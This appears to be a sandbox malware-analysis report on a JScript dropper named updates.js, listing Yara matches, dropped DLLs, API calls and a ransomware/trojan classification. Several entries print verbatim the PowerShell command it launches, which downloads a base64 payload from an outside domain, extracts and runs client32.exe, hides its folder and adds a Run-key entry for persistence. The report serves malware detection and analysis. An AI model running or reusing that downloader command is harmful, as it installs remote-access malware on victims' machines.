                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110077A0 LoadCursorA,SetCursor,GetDC,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,CreateDCA,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,SelectClipRgn,BitBlt,SelectClipRgn,DeleteObject,DeleteDC,BitBlt,ReleaseDC,CreatePen,CreateSolidBrush,GetSysColor,LoadBitmapA,_memset,_swscanf,CreateFontIndirectA,_memset,GetStockObject,GetObjectA,CreateFontIndirectA,GetWindowRect,SetWindowTextA,GetSystemMetrics,GetSystemMetrics,SetWindowPos,UpdateWindow,SetCursor,4_2_110077A0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,4_2_11114590
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11114590 PeekMessageA,GetKeyState,GetKeyState,GetKeyState,Sleep,GetKeyState,6_2_11114590
                                Source: Yara matchFile source: 7.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 7.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000007.00000002.2406887302.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.2328304043.0000000011194000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                                Source: Yara matchFile source: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICL32.DLL, type: DROPPED

                                Spam, unwanted Advertisements and Ransom Demands

                                barindex
                                Contains functionalty to change the wallpaper
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,4_2_111165C0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_111165C0 SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,RegCloseKey,SystemParametersInfoA,6_2_111165C0

                                System Summary

                                barindex
                                Malicious sample detected (through community Yara rule)
                                Source: updates.js, type: SAMPLEMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Source: Process Memory Space: wscript.exe PID: 5972, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                                Powershell drops PE file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\QCHBWPB-9\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\QCHBWPB-9\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\QCHBWPB-9\TCCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\QCHBWPB-9\remcmdstub.exeJump to dropped file
                                Windows Scripting host queries suspicious COM object (likely to drop second stage)
                                Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                Wscript starts Powershell (via cmd or directly)
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeProcess Stats: CPU usage > 49%
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11113190: GetKeyState,DeviceIoControl,keybd_event,4_2_11113190
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1115EA00 FindWindowA,_memset,CreateProcessAsUserA,GetLastError,WinExec,CloseHandle,CloseHandle,CloseHandle,WinExec,4_2_1115EA00
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,4_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,FindCloseChangeNotification,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,6_2_1102D900
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110736804_2_11073680
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11029BB04_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110627B04_2_110627B0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110336D04_2_110336D0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110518004_2_11051800
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1115F8404_2_1115F840
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1102BD404_2_1102BD40
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1101BCD04_2_1101BCD0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11087F504_2_11087F50
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11045E704_2_11045E70
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1101C1104_2_1101C110
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_111640E04_2_111640E0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_111683454_2_11168345
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_111265B04_2_111265B0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110704304_2_11070430
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_110807404_2_11080740
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1100892B4_2_1100892B
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1101CF304_2_1101CF30
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EEFA9804_2_6EEFA980
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EF23DB84_2_6EF23DB8
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EEFDBA04_2_6EEFDBA0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EF239234_2_6EF23923
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_6EF249104_2_6EF24910
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110627B06_2_110627B0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110736806_2_11073680
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110336D06_2_110336D0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110518006_2_11051800
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1115F8406_2_1115F840
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11029BB06_2_11029BB0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1102BD406_2_1102BD40
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1101BCD06_2_1101BCD0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11087F506_2_11087F50
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_11045E706_2_11045E70
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1101C1106_2_1101C110
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_111640E06_2_111640E0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_111683456_2_11168345
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_111265B06_2_111265B0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110704306_2_11070430
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_110807406_2_11080740
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1100892B6_2_1100892B
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1101CF306_2_1101CF30
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLL 3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICHEK.DLL 956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: String function: 11161299 appears 81 times
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: String function: 11027F40 appears 94 times
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: String function: 6EEF6F50 appears 101 times
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: String function: 11164ED0 appears 64 times
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: String function: 110B7EF0 appears 43 times
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: String function: 11147060 appears 1207 times
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: String function: 1105E820 appears 588 times
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: String function: 1105E950 appears 54 times
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: String function: 111744C6 appears 40 times
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: String function: 6EF07A90 appears 31 times
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: String function: 11147AD0 appears 44 times
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: String function: 6EF07D00 appears 67 times
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: String function: 11081E70 appears 89 times
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: String function: 1109DCE0 appears 32 times
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: String function: 11029A70 appears 2012 times
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: String function: 1116FED0 appears 74 times
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: String function: 6EEF30A0 appears 32 times
                                Source: updates.jsInitial sample: Strings found which are bigger than 50
                                Source: updates.js, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: 00000000.00000003.2115464380.0000027C5F890000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: Process Memory Space: wscript.exe PID: 5972, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                                Source: classification engineClassification label: mal100.rans.troj.expl.evad.winJS@8/28@2/3
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1105A760 GetLastError,FormatMessageA,LocalFree,4_2_1105A760
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,4_2_1109D860
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_1109D8F0 AdjustTokenPrivileges,FindCloseChangeNotification,4_2_1109D8F0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1109D860 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,6_2_1109D860
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 6_2_1109D8F0 AdjustTokenPrivileges,CloseHandle,6_2_1109D8F0
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11116880 CoInitialize,CoCreateInstance,LoadLibraryA,GetProcAddress,SHGetSettings,FreeLibrary,CoUninitialize,4_2_11116880
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11089430 FindResourceA,LoadResource,LockResource,4_2_11089430
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeCode function: 4_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,4_2_11128B10
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\QCHBWPB-9Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exeMutant created: NULL
                                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1492:120:WilError_03
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33jlajbv.reg.ps1Jump to behavior
                                Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe "C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe "C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe"
                                Source: unknownProcess created: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe "C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe"
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $UETAMVCS='http://luxurycaborental.com/cdn-vs/data.php?12105';$XAJCG=(New-Object System.Net.WebClient).DownloadString($UETAMVCS);$OTZWZ=[System.Convert]::FromBase64String($XAJCG);$asd = Get-Random -Minimum -10 -Maximum 37; $ZPLWC=[System.Environment]::GetFolderPath('ApplicationData')+'\QCHBWPB'+$asd;if (!(Test-Path $ZPLWC -PathType Container)) { New-Item -Path $ZPLWC -ItemType Directory };$p=Join-Path $ZPLWC 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$OTZWZ);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$ZPLWC)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $ZPLWC 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $ZPLWC -Force; $fd.attributes='Hidden';$s=$ZPLWC+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='BTGEEENA';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe "C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe" Jump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
